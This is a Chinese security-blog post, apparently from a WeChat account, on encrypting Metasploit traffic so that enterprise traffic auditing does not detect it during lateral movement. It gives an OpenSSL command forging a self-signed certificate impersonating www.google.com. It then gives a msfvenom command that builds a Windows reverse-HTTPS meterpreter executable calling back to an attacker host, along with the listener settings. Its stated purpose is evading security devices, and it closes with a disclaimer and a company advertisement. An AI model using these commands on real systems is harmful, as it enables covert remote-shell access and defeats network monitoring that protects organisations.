点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
添加星标不迷路
由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦
为什么要加密
现在大部分企业在内网中都采用了流量审计服务,用来专门分析流量特征,如我们常用的msf和cs都已经被各大安全设备所标识,在用msf进行内网横向的时候很容易被检测出来。所以我们要对流量来绕过检测
OpenSSL
OpenSSL是一个开源项目。主要包括三个组件 :
OpenSSL 多功能的命令行工具
libcrypt 加密算法库
libssl 实现了ssl和tls的加密模块
kali中集成了该工具
常用命令:
-in filename 指定要加密的文件
-out filename 指定加密后存放的位置
-salt 盐值 插入随机数作为文件内容加密
-e 指定加密算法
-d 解密 指定算法
-a/-base64 base64编码
加密过程
OpenSSL req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" -keyout www.google.com.key -out www.google.com.crt
生产key和crt
然后合成pem证书
利用msfvenom生成exe
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.206.128 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o msf.exe
放入虚拟机中设置监听
设置监听的时候要选择
set handlersslcert: 设置处理程序时将使用的证书
set StagerVerifySSLCert: 设置接收到连接时执行SSL证书验证
运行上线
查看流量
欢迎关注SecHub网络安全社区,SecHub网络安全社区目前邀请式注册,邀请码获取见公众号菜单【邀请码】
#
企业简介
赛克艾威 – 专注政企安全服务
北京赛克艾威科技有限公司(简称:赛克艾威),成立于2016年9月,具有中国网络安全审查技术与认证中心安全风险评估服务三级资质CCRC,信息安全保障人员资质CISAW(安全评估专家级)。
安全评估|渗透测试|漏洞扫描|安全巡检
代码审计|钓鱼演练|应急响应|安全运维
重大时刻安保|企业安全培训
联系方式
电话|010-86460828
官网|https://sechub.com.cn
关注我们
公众号:sechub安全
哔哩号:SecHub官方账号
原文始发于微信公众号(SecHub网络安全社区):MSF流量加密技术
